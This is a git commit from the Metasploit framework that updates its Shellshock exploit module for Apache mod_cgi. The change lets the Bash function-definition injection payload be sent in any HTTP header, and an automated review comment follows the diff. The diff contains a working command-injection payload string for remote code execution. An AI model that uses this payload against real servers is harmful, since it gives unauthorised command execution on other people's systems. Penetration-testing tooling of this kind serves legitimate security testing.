Land #3905 - Update exploits/multi/http/apache_mod_cgi_bash_env_exec

bug/bundler_fix 2014100101
sinn3r 2014-09-29 15:19:35 -05:00
commit ffe5aafb2f
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 6 additions and 3 deletions


@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Description' => %q{
This module exploits a code injection in specially crafted environment
variables in Bash, specifically targeting Apache mod_cgi scripts through
the HTTP_USER_AGENT variable.
the HTTP_USER_AGENT variable by default.
},
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
@ -58,7 +58,8 @@ class Metasploit4 < Msf::Exploit::Remote
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script']),
OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
@ -117,7 +118,9 @@ class Metasploit4 < Msf::Exploit::Remote
{
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path.to_s),
'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
'headers' => {
datastore['HEADER'] => "() { :;};echo #{marker}$(#{cmd})#{marker}"
}
}, datastore['TIMEOUT'])
end
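Review bot: In the `register_options` hunk, `METHOD` changes from an `OptEnum` limited to GET/POST to a free-form `OptString`, and the new `HEADER` option is likewise an unchecked string that the last hunk uses directly as the header name, so a malformed value (whitespace, a colon, a line break) is only noticed when the request is built or fails. If free-form input is intended, a one-line comment saying why the enum was dropped would help, and the header name could be checked before use, for example `fail_with(Failure::BadConfig, 'HEADER must be a valid header name') unless datastore['HEADER'] =~ /\A[\w-]+\z/`. The option text `'HTTP header to use'` could also state that this is the header carrying the crafted value, since the description now only says "by default". Both the `register_options` call and the request method begin outside the visible hunks, so the right place for the check is inferred rather than shown.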